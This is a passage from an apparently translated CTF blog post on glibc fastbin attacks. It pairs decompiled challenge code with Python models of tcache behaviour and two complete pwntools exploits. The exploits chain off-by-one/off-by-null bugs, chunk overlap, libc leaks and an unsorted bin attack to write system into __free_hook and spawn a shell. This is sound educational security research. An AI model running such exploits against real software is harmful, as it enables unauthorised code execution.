int v4; // [rsp+14h] [rbp-Ch]

printf("index: ");
v2 = choice(v1);
v3 = v2;
if ( v2 >= 0 && v2 <= 15 )
{
v2 = *((_DWORD *)&chunk_status + 4 * v2);
if ( v2 == 1 )
{
printf("size: ");
v2 = choice(1);
v4 = get_size(*((_DWORD *)&chunk_size + 4 * v3), v2);
if ( v2 > 0 )
{
printf("content: ", (unsigned int)v2);
v2 = read_data(chunk_array[2 * v3], v4);
}
}
}
return (unsigned int)v2;
}

__int64 __fastcall get_size(int a1, unsigned int a2)
{
__int64 result; // rax

if ( a1 > (signed int)a2 )
return a2;
if ( a2 - a1 == 10 )
LODWORD(result) = a1 + 1;
else
LODWORD(result) = a1;
return (unsigned int)result;
}

The add function caps the allocation size at 0x1000 (4096). One more thing to note: add allocates with calloc, which zeroes the memory first and does not take chunks from tcache.
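The interaction between calloc and tcache is easy to get wrong, so here is a deliberately simplified model of one fastbin-sized bin. It is a toy under stated assumptions (seven tcache slots per bin, calloc never reading from tcache), not a description of every Glibc code path.

```python
TCACHE_MAX = 7  # default number of tcache entries per bin


class BinModel:
    """Counts where chunks of one fastbin-sized class end up."""

    def __init__(self):
        self.tcache = 0    # chunks parked in the tcache bin
        self.fastbin = 0   # chunks parked in the fastbin
        self.from_top = 0  # allocations carved from the top chunk

    def free(self):
        # free() prefers the tcache bin until it is full
        if self.tcache < TCACHE_MAX:
            self.tcache += 1
        else:
            self.fastbin += 1

    def calloc(self):
        # calloc skips the tcache lookup, so only the fastbin or top serve it
        if self.fastbin:
            self.fastbin -= 1
            return "fastbin"
        self.from_top += 1
        return "top"


if __name__ == "__main__":
    model = BinModel()
    for _ in range(7):
        model.calloc()
        model.free()
    print(model.tcache, model.from_top)  # tcache is now full
    model.calloc()
    model.free()                         # eighth free goes to the fastbin
    print(model.calloc())
```

This is the reason the exploit first burns seven allocate/free pairs per size: only after that do frees reach the fastbin, and only while the tcache bin is still filling does every calloc come from the top chunk.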

__int64 add()
{
__int64 result; // rax
unsigned int i; // [rsp+4h] [rbp-1Ch]
int v2; // [rsp+8h] [rbp-18h]
signed int v3; // [rsp+8h] [rbp-18h]
void *v4; // [rsp+10h] [rbp-10h]

result = 0LL;
for ( i = 0; (signed int)i <= 15; ++i )
{
result = *((unsigned int *)&chunk_status + 4 * (signed int)i);
if ( !(_DWORD)result )
{
printf("size: ");
v3 = choice(v2);
if ( v3 > 0 )
{
if ( v3 > 4096 )
v3 = 4096;
v4 = calloc(v3, 1uLL);
if ( !v4 )
exit(-1);
*((_DWORD *)&chunk_status + 4 * (signed int)i) = 1;
*((_DWORD *)&chunk_size + 4 * (signed int)i) = v3;
chunk_array[2 * (signed int)i] = v4;
printf("The lowbits of heap leak check : %x\n", chunk_array[2 * (signed int)i] & 0xFFFLL);
printf("the index of ticket is %d \n", i);
}
return i;
}
}
return result;
}


Main idea:

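  1. The challenge does not ship a libc. We can still tell that tcache is present because add prints the low 12 bits of each chunk address, which makes it obvious that a 0x250-byte tcache struct sits at the start of the heap.
  2. Allocate and free seven chunks of size 0x71 beforehand to fill the tcache bin; only then do freed chunks of that size go into the fastbin, enabling the fastbin attack.
  3. Use the off-by-one in edit to form a chunk overlap, then modify the next chunk's size to create an unsorted bin chunk and leak a libc address.
  4. Use the chunk overlap to get a UAF and run a fastbin attack that plants a size just above top in main_arena. Note that the region I allocate contains __malloc_hook, so it must be kept NULL.
  5. Run another fastbin attack to change top to __free_hook-0xb58. I am not sure whether the other fields of main_arena would cause side effects elsewhere, so leave everything else untouched as far as possible.
  6. Keep allocating and freeing (the number of chunks is limited). This again relies on calloc not allocating from tcache. Once a tcache bin is full, be sure to switch to a different tcache bin; otherwise the chunk just freed goes into the fastbin and the next allocation is not cut from the top chunk.
  7. Once the allocation reaches the area above __free_hook, write system into __free_hook. Some locations above __free_hook must not be written (this needs a closer look): during debugging, filling certain locations made the program enter __lll_lock_wait_private and deadlock, so pad everything else with "\x00".
  8. Then free a chunk containing "/bin/sh" to trigger system("/bin/sh").
    My full exploit: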
    context.log_level = "debug"

    def add(size):
        p.sendlineafter("CHOICE: ", "1")
        p.sendlineafter("size: ", str(size))
        p.recvuntil("The lowbits of heap leak check : ")
        return p.recv(3)

    def edit(index, size, content):
        p.sendlineafter("CHOICE: ", "2")
        p.sendlineafter("index: ", str(index))
        p.sendlineafter("size: ", str(size))
        p.sendafter("content: ", content)

    def delete(index):
        p.sendlineafter("CHOICE: ", "3")
        p.sendlineafter("index: ", str(index))

    def view(index, label=""):
        p.sendlineafter("CHOICE: ", "4")
        p.sendlineafter("index: ", str(index))
        if label != "":
            p.recvuntil(label)
        else:
            p.recvuntil("content: ")

    unsorted_bin_offset = 0x60
    main_arena_offset = 0x3ebc40
    __malloc_hook_offset = 0x3ebc30
    __free_hook_offset = 0x3ed8e8
    realloc_offset = 0x98c30
    system_offset = 0x4f440

    # fill the 0x70 tcache bin
    for i in range(7):
        chunk = add(0x68)
        delete(0)

    chunk_0 = add(0x58)
    chunk_0 = int(chunk_0, 16)

    chunk_1 = add(0x18)

    # unsorted bin
    chunk_2 = add(0xF8)

    # overwrite size
    edit(0, 0x58 + 10, "A" * 0x58 + "\x71")

    # create unsorted bin
    edit(2, 0x50, "A" * 0x40 + p64(0) + p64(0x21))
    delete(1)
    chunk_1 = add(0x68)
    edit(1, 0x20, "B" * 0x18 + p64(0x501))

    # leave enough space
    for i in range(5):
        chunk_3 = add(0xF8)
        delete(3)

    # free unsorted bin
    delete(2)

    # leak libc
    view(1, p64(0x501))
    main_arena = u64(p.recv(8))
    libc_base = main_arena - unsorted_bin_offset - main_arena_offset
    __malloc_hook = libc_base + __malloc_hook_offset
    __free_hook = libc_base + __free_hook_offset
    libc_realloc = libc_base + realloc_offset
    libc_system = libc_base + system_offset

    # chunk_overlap + uaf
    chunk_2 = add(0x58)
    chunk_3 = add(0x58)
    chunk_4 = add(0x68)
    edit(2, 0x58 + 10, "D" * 0x58 + "\x71")
    edit(4, 0x10, p64(0) + p64(0x21))
    delete(3)
    chunk_3 = add(0x68)
    edit(3, 0x60, "E" * 0x50 + p64(0) + p64(0x71))
    delete(4)
    edit(3, 0x68, "E" * 0x50 + p64(0) + p64(0x71) + p64(__malloc_hook - 0x23))
    chunk_4 = add(0x68)

    # create size area for malloc fastbin over main_arena->top_chunk
    chunk_5 = add(0x68)
    edit(5, 0x33, "F" * 0x13 + p64(0) + p64(0x71) * 3)

    # uaf again
    delete(4)
    edit(3, 0x68, "E" * 0x50 + p64(0) + p64(0x71) + p64(__malloc_hook))
    chunk_4 = add(0x68)
    chunk_6 = add(0x68)
    edit(6, 0x68, "\x00" * 0x60 + p64(__free_hook - 0xb58))

    # use unsorted bin
    for i in range(7):
        chunk_7 = add(0x100)
        delete(7)
    for i in range(7):
        chunk_7 = add(0xE8)
        delete(7)

    # write __free_hook
    chunk_7 = add(0xE8)
    edit(7, 0x80, "/bin/sh\x00" + "\x00" * 0x70 + p64(libc_system))

    # trigger __free_hook
    delete(7)

    success("main_arena: " + hex(main_arena))
    success("libc_base: " + hex(libc_base))
    success("__malloc_hook: " + hex(__malloc_hook))
    success("__free_hook: " + hex(__free_hook))
    success("libc_system: " + hex(libc_system))

    p.interactive()

unsorted bin attack to create size over __free_hook

This also targets __free_hook, only this time through a fastbin attack: an unsorted bin attack forges a size above __free_hook for the fastbin attack to use.

Principle

The unsorted bin attack itself is not explained again here; see BookWriter.

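One point needs attention: after the unsorted bin attack the program must keep running normally for the later stages, so nothing may touch the unsorted bin again (its list is corrupted by then). That means the malloc that triggers the unsorted bin attack must request exactly the size of the unsorted chunk; otherwise the chunk is split and the remainder is linked back into the unsorted bin, which crashes the program.

Also, if the unsorted chunk's size is forged, it still has to satisfy the size constraints for unsorted bin chunks, or the program crashes as well.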
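To see how the unsorted bin attack produces a usable fastbin size, the sketch below works through the offsets used in the exploit later in this section: bk is set to __free_hook - 0x50 and the fake fastbin chunk to __free_hook - 0x43. The addresses are made-up sample values, and the surrounding memory is assumed to be zero, as observed above __free_hook.

```python
import struct


def unsorted_bin_attack_target(bk):
    # malloc does `bck = victim->bk; bck->fd = unsorted_chunks(av);`
    # and fd lives 0x10 bytes into a chunk, so the write lands at bk + 0x10
    return bk + 0x10


def fake_size_field(free_hook, written_value):
    """Size field a fake chunk at free_hook - 0x43 sees after the write."""
    write_addr = unsorted_bin_attack_target(free_hook - 0x50)
    raw = struct.pack("<Q", written_value)
    memory = {write_addr + i: raw[i] for i in range(8)}  # other bytes are 0
    size_addr = (free_hook - 0x43) + 8
    return sum(memory.get(size_addr + i, 0) << (8 * i) for i in range(8))


if __name__ == "__main__":
    free_hook = 0x7FFFF7DD37A8   # hypothetical addresses, illustration only
    arena_ptr = 0x7FFFF7DD1B78   # a main_arena pointer of the form 0x7f...
    print(hex(unsorted_bin_attack_target(free_hook - 0x50) - free_hook))
    print(hex(fake_size_field(free_hook, arena_ptr)))
```

The pointer is written at __free_hook - 0x40, its 0x7f byte falls on the size field of the fake chunk, and the user data of that chunk starts at __free_hook - 0x33, which matches the 0x33 bytes of padding before system's address.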

Example

Secret Of My Heart

set_data, called from add, has an obvious off-by-null bug:

int add()
{
signed int i; // [rsp+4h] [rbp-Ch]
size_t v2; // [rsp+8h] [rbp-8h]

for ( i = 0; ; ++i )
{
if ( i > 99 )
return puts("Fulled !!");
if ( !*(_QWORD *)(chunk_array + 0x30LL * i + 0x28) )
break;
}
printf("Size of heart : ");
v2 = (signed int)choice();
if ( v2 > 0x100 )
return puts("Too big !");
set_data((size_t *)(chunk_array + 48LL * i), v2);
return puts("Done !");
}

_BYTE *__fastcall set_data(size_t *a1, size_t a2)
{
_BYTE *result; // rax
size_t size; // [rsp+0h] [rbp-20h]

*a1 = a2;
printf("Name of heart :", a2);
read_data(a1 + 1, 0x20u);
a1[5] = (size_t)malloc(size);
if ( !a1[5] )
{
puts("Allocate Error !");
exit(0);
}
printf("secret of my heart :", 32LL);
result = (_BYTE *)(a1[5] + (signed int)read_data((void *)a1[5], size));
*result = 0;
return result;
}

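Main exploitation idea:

  1. Use the off-by-null in add to trigger an unlink on the unsorted bin and form a chunk overlap.
  2. Use the chunk overlap to leak a libc address first.
  3. Use an unsorted bin attack (with bk set to __free_hook-0x50) to write a main_arena address at __free_hook-0x50+0x10.
  4. Use the high byte 0x7F of the main_arena address written at __free_hook-0x50+0x10 as the size for a fastbin attack, and write system into __free_hook.
  5. Free a chunk containing "/bin/sh" to get a shell (this failed locally but worked remotely, which is a bit odd).
    My exploit: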
    context.log_level = "debug"

    def add(size, name, content):
        p.sendlineafter("Your choice :", "1")
        p.sendlineafter("Size of heart : ", str(size))
        p.sendafter("Name of heart :", name)
        p.sendafter("secret of my heart :", content)

    def view(index, label):
        p.sendlineafter("Your choice :", "2")
        p.sendlineafter("Index :", str(index))
        p.recvuntil(label)

    def delete(index):
        p.sendlineafter("Your choice :", "3")
        p.sendlineafter("Index :", str(index))

    unsorted_bin_offset = 0x58
    main_arena_offset = 0x3c3b20
    system_offset = libc.symbols["system"]
    __free_hook_offset = libc.symbols["__free_hook"]
    # realloc_offset = libc.symbols["realloc"]

    # unlink and chunk overlap
    add(0xF8, "AAAA", "AAAA") # chunk 0
    add(0x38, "BBBB", "BBBB") # chunk 1
    add(0x38, "CCCC", "CCCC") # chunk 2
    add(0xF8, "DDDD", "DDDD") # chunk 3
    add(0x18, "EEEE", "EEEE") # chunk 4
    delete(2)
    add(0x38, "CCCC", "C" * 0x20 + p64(0) + p64(0x21) + p64(0x180)) # chunk 2
    delete(0)
    delete(3)
    delete(4)

    # leak libc
    add(0xF8, "AAAA", "AAAA") # chunk 0
    view(1, "Secret : ")
    main_arena = u64(p.recv(6).ljust(8, "\x00"))
    libc_base = main_arena - unsorted_bin_offset - main_arena_offset
    __free_hook = libc_base + __free_hook_offset
    libc_system = libc_base + system_offset

    # recover the unsorted bin
    delete(0)

    # chunk overlap
    add(0xE8, "AAAA", "AAAA") # chunk 0
    add(0xF8, "DDDD", p64(0) + p64(0x61) + "D" * 0x58 + p64(0x21)) # chunk 3
    delete(1)
    delete(3)

    # chunk overlap again
    add(0xF8, "BBBB", "B" * 0x48 + p64(0x71) + "B" * 0x68 + p64(0x21)) # chunk 1
    delete(2)
    delete(1)

    # unsorted bin attack
    add(0x98, "BBBB", p64(0) + p64(0x61) + "B" * 0x30 + p64(0) + p64(0x71)) # chunk 1
    add(0x58, "CCCC", "\x00" * 0x30 + p64(0) + p64(0x71) + p64(__free_hook - 0x43)) # chunk 2
    add(0x68, "DDDD", "\x00" * 0x40 + p64(0) + p64(0xA1) + p64(main_arena) + p64(__free_hook - 0x50)) # chunk 3

    # trigger unsorted bin attack
    add(0x98, "EEEE", "EEEE") # chunk 4

    # write __free_hook
    add(0x68, "FFFF", "\x00" * 0x33 + p64(libc_system)) # chunk 5

    # trigger __free_hook
    add(0x18, "GGGG", "/bin/sh\x00") # chunk 6
    delete(6)

    success("libc_base: " + hex(libc_base))
    success("libc_system: " + hex(libc_system))
    success("__free_hook: " + hex(__free_hook))

    p.interactive()

write _IO_FILE vtable

I have not run into this one or implemented it myself yet; to be added.

Summary

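  • I had hit cases before where overwriting __malloc_hook with a one_gadget did not work on the first try, but the realloc adjustment always fixed it (I assumed it was universal and was proven wrong). This time several challenges could not be solved that way, so I picked up a few new tricks.
  • I had never seen the top chunk overwrite technique before; that one was new to me.
  • __free_hook is still more reliable than __malloc_hook; one_gadget constraints are sometimes just too hard to satisfy.
  • Both challenges that trigger __malloc_hook through malloc_printerr and get a shell with a one_gadget used the [rsp+0x50]==NULL constraint. Is that a coincidence, a likely outcome, or guaranteed?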

References

  1. https://bbs.pediy.com/thread-225973.htm
  2. https://xuanxuanblingbling.github.io/ctf/pwn/2020/03/21/garden/
  3. https://www.anquanke.com/post/id/171283#h2-0
  4. https://bbs.pediy.com/thread-230028.htm
  5. https://elixir.bootlin.com/glibc/glibc-2.23/source
Author: Nop
Link: https://n0nop.com/2020/04/15/Fastbin-attack-%E5%B0%8F%E7%BB%93/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.